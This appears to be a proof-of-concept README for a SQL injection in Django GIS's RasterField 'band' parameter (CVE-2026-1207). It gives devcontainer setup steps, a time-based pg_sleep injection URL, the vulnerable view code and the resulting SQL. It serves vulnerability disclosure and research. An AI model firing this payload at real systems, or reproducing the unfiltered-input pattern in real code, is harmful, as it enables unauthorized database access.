## https://sploitus.com/exploit?id=8BEE39A6-841F-5844-893C-47BC6DC07F18
# CVE-2026-1207: Django GIS RasterField SQL Injection Vulnerability Demonstration
## Vulnerability Overview
**Vulnerability Type**: SQL Injection
**Affected Component**: `django.contrib.gis`βs RasterField
When using Django GISβs `RasterField` for queries, the `band` parameter is directly concatenated into the SQL statement, resulting in an SQL injection vulnerability. Attackers can inject arbitrary SQL code by constructing malicious `band` parameter values.
## Project Structure
```
CVE-2026-1207/
βββ .devcontainer/ # VSCode DevContainer configuration
βββ .vscode/ # VSCode configuration files
βββ vuln/ # Vulnerability demonstration application
β βββ models.py # Model containing the RasterField
β βββ views.py # Vulnerability trigger point
β βββ migrations/ # Database migration files
βββ web/ # Django project configuration
βββ manage.py
βββ README.md
```
## Environment Setup
This vulnerability demonstration uses VSCodeβs devcontainer for building.
### 1οΈβ£ Open the Project
Open the root directory of the existing project in VS Code (including the `.devcontainer` folder).
### 2οΈβ£ Reopen the Container (Build Dev Container)
Press `Ctrl+Shift+P` (Windows/Linux) or `Cmd+Shift+P` (Mac).
Enter `Remote-Containers: Reopen in Container`.
VS Code will read the `.devcontainer` configuration and build the container (it may take a few minutes for the first build).
β οΈ If the Dockerfile or dependencies have been updated, you can choose `Remote-Containers: Rebuild Container` to ensure youβre using the latest environment.
### 3οΈβ£ Run the Django Development Server
Open the command panel (`Ctrl+Shift+P`).
Enter `Tasks: Run Task`.
Select `django:start` (the task is already configured in `.vscode/tasks.json`).
This task will start the Django development server within the container.
The server listens on `0.0.0.0:8087` by default.
### 4οΈβ£ Access the Project via Browser
Visit the project using a browser:
```
http://localhost:8087
```
### 5οΈβ£ Notes
The first run may require running database migrations:
```bash
python manage.py migrate
```
## Vulnerability Demonstration
Details of the vulnerability analysis can be found at [https://xz.aliyun.com/news/91993](https://xz.aliyun.com/news/91993).
For more information, visit our WeChat public account: [https://mp.weixin.qq.com/s/p7EZRKZBp-mRGhYqyc8i3A](https://xz.aliyun.com/news/91993)
### POC: Delayed Injection
Visit the following URLs to trigger SQL injection:
```
http://localhost:8087/book/search?band=1);select%20%271%27||pg_sleep(3)--
```
Observe the response time; a normal request should return immediately, while an injected request will be delayed by about 3 seconds.
### Location of the Vulnerability Code
[vuln/views.py:36](vuln/views.py#L36)
```python
def get(self, request: HttpRequest):
band = request.GET.get("band", 1) # Unfiltered user input
rast = GDALRaster(...)
qs = RasterModel.objects.filter(rast__contains=(rast, band)) # Band is directly used in the query
print(qs.query) # Generated SQL is displayed
qs.count()
return HttpResponse("book app")
```
### Generated SQL after Injection
```
SELECT ... FROM vuln_rastermodel
WHERE ST_Contains("vuln_rastermodel"."rast", ST_ContainsParam(..., 1));SELECT '1'||pg_sleep(3) --))
```
## Disclaimer
This project is intended for security research and educational purposes only. Do not use it on unauthorized systems.